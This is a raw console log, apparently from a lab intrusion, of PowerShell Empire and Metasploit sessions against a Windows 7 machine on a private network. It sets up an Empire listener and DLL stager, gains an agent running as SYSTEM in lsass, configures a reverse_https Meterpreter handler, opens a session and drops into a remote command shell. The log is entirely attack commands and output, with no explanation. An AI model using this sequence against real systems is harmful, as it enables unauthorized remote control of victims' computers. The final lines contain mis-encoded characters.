(Empire) > set Name Eternal [!] Please choose 'ip_whitelist' or 'ip_blacklist' (Empire) > list list listeners (Empire) > listeners [!] No listeners currently active (Empire: listeners) > set Name Eternal (Empire: listeners) > set Host http://192.168.31.30 (Empire: listeners) > set Port 8080 (Empire: listeners) > execute [!] Error starting listener on port 8080: [Errno 98] Address already in use [!] Error starting listener on port 8080, port likely already in use. (Empire: listeners) > set Port 8000 (Empire: listeners) > execute [*] Listener 'Eternal' successfully started. (Empire: listeners) > list
[*] Active listeners:
ID Name Host Type Delay/Jitter KillDate Redirect Target -- ---- ---- ------- ------------ -------- --------------- 1 Eternal http://192.168.31.30:8000 native 5/0.0
[*] Stager output written out to: /tmp/launcher.dll
(Empire: stager/dll) > [+] Initial agent RDZ4SYWEFTKBF3FD from 192.168.31.252 now active
(Empire: stager/dll) > agents
[*] Active agents:
Name Internal IP Machine Name Username Process Delay Last Seen --------- ----------- ------------ --------- ------- ----- -------------------- RDZ4SYWEFTKBF3FD 192.168.31.252 USER-20170312IA *WorkGroup\SYSTEM lsass/792 5/0.0 2017-04-27 02:09:35
msf > use exploit/multi/handler msf exploit(handler) > msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_h set PAYLOAD windows/meterpreter/reverse_hop_http set PAYLOAD windows/meterpreter/reverse_http set PAYLOAD windows/meterpreter/reverse_http_proxy_pstore set PAYLOAD windows/meterpreter/reverse_https set PAYLOAD windows/meterpreter/reverse_https_proxy msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_https msf exploit(handler) > set LHOST 192.168.31.30 LHOST => 192.168.31.30 msf exploit(handler) > set LPORT 9999 LPORT => 9999 msf exploit(handler) > exploit
[*] Started HTTPS reverse handler on https://192.168.31.30:9999 [*] Starting the payload handler... [*] https://192.168.31.30:9999 handling request from 192.168.31.252; (UUID: 7pzlvccd) Staging Native payload... [*] Meterpreter session 1 opened (192.168.31.30:9999 -> 192.168.31.252:49714) at 2017-04-27 02:20:13 +0800
meterpreter > sysinfo Computer : USER-20170312IA OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 (Current Process is WOW64) System Language : zh_CN Domain : WorkGroup Logged On Users : 1 Meterpreter : x86/win32 meterpreter > shell Process 2432 created. Channel 1 created. Microsoft Windows [�汾 6.1.7601] ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ�